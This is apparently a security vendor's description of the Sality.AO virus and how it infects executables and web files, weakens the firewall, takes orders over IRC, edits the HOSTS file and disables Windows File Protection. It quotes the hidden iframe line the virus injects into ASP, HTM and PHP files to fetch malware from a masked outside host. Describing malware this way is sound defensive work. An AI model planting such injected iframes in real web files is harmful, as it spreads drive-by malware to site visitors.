Details of Virus Sality.AO

Sality.AO carries out the following actions:

• It infects the following files:
  - files with an EXE and SCR extension.
  - files with an ASP, HTM and PHP extension by using the following script:
  <iframe scr=”http://xxxxxxx.pl/rc”width=1 height=2 style=”border:0”></iframe>
  It adds this script in the files it finds in the affected computer.
  This script allows the virus to download different types of malware to the affected computer.
• It reduces the security level of the computer, as it adds itself to the list of authorized applications by the firewall, in order to avoid being blocked.
• It connects to an IRC channel and waits for remote instructions, such as downloading files or stealing information. In order to do so, it modifies the HOSTS file adding the following string:
  127.0.01 <blocked>F.pl
• It disables Windows File Protection (WFP) and the checking of these files when Windows is started:
  - Windows File Protection prevents critical Windows system files from being replaced. Programs must not overwrite these files because they are used by the operating system and other programs.
  - The System File Checker tool checks if the protected files have been modified. If so, it recovers the original protected files.
  As it disables both features, the Windows protected files can be modified, which could cause problems with the operating system and the installed programs.